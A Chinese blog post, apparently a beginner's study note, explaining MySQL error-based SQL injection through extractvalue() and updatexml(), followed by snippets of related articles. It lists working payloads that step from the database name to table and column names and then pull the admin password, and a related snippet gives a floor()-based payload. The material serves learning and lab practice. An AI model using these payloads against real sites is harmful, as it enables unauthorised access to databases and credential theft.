SQL初学(4):报错注入

最新推荐文章于 2024-04-19 17:02:43 发布
最新推荐文章于 2024-04-19 17:02:43 发布
阅读量359 收藏
点赞数
文章标签: sql mysql 数据库 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64417923/article/details/124611168
版权

感觉比上一个时间盲注要简单一些。

SQL报错注入就是利用数据库的机制,人为地制造错误条件,使得在显示错误信息同时返回查询结果。这种手段在联合查询受限且能返回错误信息的情况下比较好用。

一,xpath语法错误引发的报错注入:

使用的函数语句:

1,extractvalue

的作用是从 xml 文档中查询指定字符串,具体用法是:

 EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称;
第二个参数:XPath_string (Xpath格式的字符串);
作用:从目标XML中返回包含所查询值的字符串;
与updatexml()函数相似,该函数对XPath_string进行查询操作,如果符合语法格式要求,则从目标XML中返回包含所查询值的字符串,
不符合语法格式要求,则会报错并带出查询的结果

 ep:

id=1 and extractvalue("anything",concat('~',(user()))) id=1 
and extractvalue("anything",concat(0x7e,(user()))) //0x7e是 ~ 的hex格式。

 

2,updatexml

extractvalue用法相似,多了一个需要赋值的参数

 

UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称;
第二个参数:XPath_string (Xpath格式的字符串);
第三个参数:new_value,String格式,替换查找到的符合条件的数据;
该函数对XPath_string进行查询操作,如果符合语法格式要求,则用第三个参数替换,不符合语法格式要求,则会报错并带出查询的结果

二, 构造payload

那么此时payload就和(1)中的差不多啦,按照步骤查询数据库名称,联合查询爆表名,联合查询爆字段,获取flag

id=1 and extractvalue("anything",concat(0x7e,(select database())))#
id=1 and extractvalue("anything",concat(0x7e,(select group_concat(table_name) from
information_schema.tables where table_schema="users")))#
id=1 and extractvalue("anything",concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_name="userinfo")))#
id=1 and extractvalue("anything",concat(0x7e,(select passwd from userinfo where
uname = 'admin')))#
m0_64417923
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL报错注入
qq_64332865的博客
02-18 580
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询信息通过页面的错误提示回显出来。报错注入一般需要具备两个提条件: 1. Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上...
SQL 报错注入详解
2301_78008478的博客
05-08 879
近期学习 SQL 报错注入,本篇文章为关于报错注入的一些个人理解,如有错误,希望指出 本文使用 sqli-labs 数据库作为示例报错注入方式有很多,其中比较常见的有 floor() 、extractvalue() 、updatexml() 三种,本篇文章主要对这三种进行分析先贴上一个常见的 payload 再进行分析 (sqli-labs Less-5) 复制首先这个 payload 和网上很多的不太一样,查阅网上相关博客时发现大多数的 payload 都是这样写的 复制这个就是把发生报错的 se
半小时了解SQL注入漏洞?(注入方式大全+绕过大全)
Karka_的博客
03-11 966
🏆今日学习目标:🍀学习了解sql注入漏洞✅创作者:贤鱼⏰预计时间:35分钟具体详细介绍在专栏中有单独介绍,可以查看只有了解才能注入。
sql注入(报错注入
最新发布
2302_79119987的博客
04-19 1023
实行注入的地方。
sql注入知识---报错注入
尘玥的故事
04-03 280
1 、通过floor报错 , 注入语句如下: and select 1 from(select count() , concat(version() , floor(rand(0) 2)) x from information_schema . tables group by x) a);
SQL注入实战之报错注入篇(updatexml extractvalue floor)
qq_41272376的博客
03-03 1361
SQL注入实战之报错注入篇(updatexml extractvalue floor) 知识铺垫 在上一篇中我们在漏洞页面中进行了SQL注入实战之联合查询,这篇文章带来的是SQL注入之报错注入篇。 首先我们来细分一下SQL注入分类 SQL注入分类: 回显正常—> 联合查询 union select 回显报错—> Duplicate entry() extractvalue()    updatexml() 盲注 —>布尔型盲注 基于时间的盲注sleep()
MrWQ#vulnerability-paper#SQL 注入基础 (报错注入及延时注入)1
07-25
1、判断是否存在报错 2、group by 虚拟表主键重复冲突 3、extractvalue() 函数 4、updatexml() 函数 1、判断字符注入 2、
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在Web应用程序中,当用户输入的数据错误地用于构造数据库查询时,导致数据库返回错误信息。这些错误信息可能包含敏感数据,从而让攻击者能够获取未授权的信息或者控制数据库。...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SqlServer2008安装报错处理
07-20
本文解决安装SQL Server2008R时试图执行未经授权的操作错误问题,在安装时经常会出现一些错误,弄的我们很烦躁。这里整理了一些在安装时出现错误该如何解决的方法。
报错注入显示不全问题
矜庄寂寥的博客
12-18 3840
目录介绍实验环境解决方法0x010x02 方法一(利用limit子句)0x02 方法二(使用mid函数)0x03 方法三(sqlmap O(∩_∩)O) 介绍 在sql主任中使用 updatexml extractvalue exp floor函数进行报错注入时,有时会出现由于数据的数量过多导致无法一次性显示所有内容,所以鄙人就去寻找了几种解决方法 实验环境 本次实验使用的是github上开源的sqli-labs训练靶场 地址:https://github.com/Audi-1/sqli-labs 解决
updatexml函数
m0_62092622的博客
01-27 9151
先介绍一下updatexml函数 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称 第二个参数:XPath_string (Xpath格式的字符串) 第三个参数:new_value,String格式,替换查找到的符合条件的数据sql-labs第十七关为例 由于本关username过滤比较严格,所以password就成了注入点 根据报错来获取所需要的信...
SQL注入——联合查询报错注入
18年3月萌新白帽子
06-11 6155
1.别人可能用一个括号将要查询的内容阔在一起了  可以使用)将其闭合2.还有人可能过滤掉了关键字可以使用如下方法anandd   selecselectt如果URL中把=号过滤掉了可以使用like进行模糊查询报错注入sql里 0x3a表示一个冒号具体用法and (select 1 from (select count(*),concat((select count(schema_name) fr...
payload sql注入_sql注入之payload
weixin_29911569的博客
01-14 599
/**GET,post*有返回**/基于报错SQL注入1、获取字段数' order by 5 --+2、获取表名0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+select group_concat(table_name) fr...
SQL注入之报错注入的一些随笔
郁离歌丶的博客
03-21 4473
0x00.序言关于报错注入的话虽然我在我之的文章里面写了一些,但是sql注入的姿势实在是太多了。之写过的payload不全也不系统。今天抽出时间来总结一下。ps:关于报错注入的原理和使用的基本函数我在我之的文章《SQLI-LABS修炼笔记(二)》中已经详细说过了,如果不懂可以去看看。ps的ps:这里以SQLI-LABS的LESS-5为例题作为示范。0x01.floor()报错注入http:/...
SQL注入之报错型注入
梁顿的专栏
10-31 4994
介绍联合查询可以把我们想要数据展示在网页上,替代网页上原有的数据内容;而今天我们要讨论的是,网页上没有展示查询结果的地方,也就是说select语句执行结果不能出现在网页上,我们需要让执行结果出现在其它地方,出现在哪呢?出现在报错语句中。 数据库返回到页面上的唯一信息就是,mysql错误。因此,我们需要以一种方式处理我们的查询,以便通过错误获取数据库信息查询条件必须是正确的,能被后端数据库解释执
学习基于extractvalue()和updatexml()的报错注入
热门推荐
超人学飞的日子
06-09 5万+
extractvalue()extractvalue() :对XML文档进行查询的函数其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样语法:extractvalue(目标xml文档,xml路径)第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报...
24、显错注入(updatexml和extractvalue)
weixin_41489908的博客
12-17 361
首先介绍两个函数 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件...
SQL注入中的报错注入
04-05
报错注入是一种利用SQL语句执行错误返回的方式来获取数据库信息的攻击手段。攻击者通过构造恶意的SQL语句,使得数据库系统在执行时出现错误,从而获得敏感信息或者执行非法操作。 报错注入的原理是利用数据库系统在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值